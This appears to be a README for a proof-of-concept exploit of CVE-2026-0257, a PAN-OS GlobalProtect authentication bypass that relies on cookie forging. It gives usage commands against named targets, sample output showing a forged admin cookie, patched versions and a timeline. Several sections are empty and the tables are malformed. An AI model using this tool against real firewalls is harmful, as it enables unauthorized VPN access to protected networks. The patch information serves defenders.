
CVE-2026-0257
PAN-OS: GlobalProtect Authentication Bypass Vulnerabilities
Authentication Bypass in GlobalProtect Portal & Gateway
CVE-2026-0257 is an authentication bypass vulnerability affecting the GlobalProtect portal and gateway components of Palo Alto Networks PAN-OS software.
An unauthenticated remote attacker can bypass security restrictions and establish an unauthorized VPN connection to affected firewalls.
Note: Panorama and Cloud NGFW are not impacted.
| Metric | Score |
|---|
Vector (CVSS 4.0 example):
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N
Authentication bypass vulnerabilities in the GlobalProtect portal and gateway of Palo Alto Networks PAN-OS® software allow the attacker to bypass security restrictions and establish an unauthorized VPN connection.
The issue stems from CWE-565: Reliance on Cookies without Validation and Integrity Checking.
Not Affected:
This vulnerability requires the following configuration to be exploitable:
High impact on confidentiality and integrity of protected networks.
python3 CVE-2026-0257.py --target vpn.company.com
python3 CVE-2026-0257.py --target 192.168.1.100 --user administrator --verbose
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0257 - GlobalProtect Auth Bypass ║
║ Public Key Cookie Forging Exploit ║
║ Author: 0xBlackash ║
╚══════════════════════════════════════════════════════════════╝
[*] Connecting to vpn.company.com:443 to extract certificate chain...
[+] Found 2048-bit RSA key
[*] Forging authentication cookie for user: admin
[1/1] Trying public key...
Cookie (first 60 chars): eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
[+] SUCCESS! Authentication Bypass Achieved!
Username : admin
Cookie : eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
Fixed Versions (apply urgently):
| PAN-OS Version | Fixed Release |
|---|---|
| 12.1 | ≥ 12.1.4-h6, ≥ 12.1.7 |
| 11.2 | ≥ 11.2.4-h17, ≥ 11.2.7-h14, etc. |
| 11.1 | ≥ 11.1.4-h33, ≥ 11.1.7-h6, etc. |
| 10.2 | ≥ 10.2.7-h34, ≥ 10.2.10-h36, etc. |
Prisma Access also has corresponding fixed versions.
Immediate Workarounds (if patching not possible):
| Date | Event |
|---|---|
| 2026-05-13 | CVE Published + Initial Advisory |
| 2026-05-17 | Exploitation observed in the wild |
Recommendation: Patch immediately — treat as critical despite base CVSS score due to active exploitation.
Generated in README style — May 30, 2026
| Rating |
|---|
| CVSS v4.0 | 7.8 / 4.7 | High / Medium |
| CVSS v3.x | Up to 9.8 | Critical |
| Urgency | HIGHEST | - |
| Palo Alto update + CISA KEV addition |
| 2026-05-30 | This Report |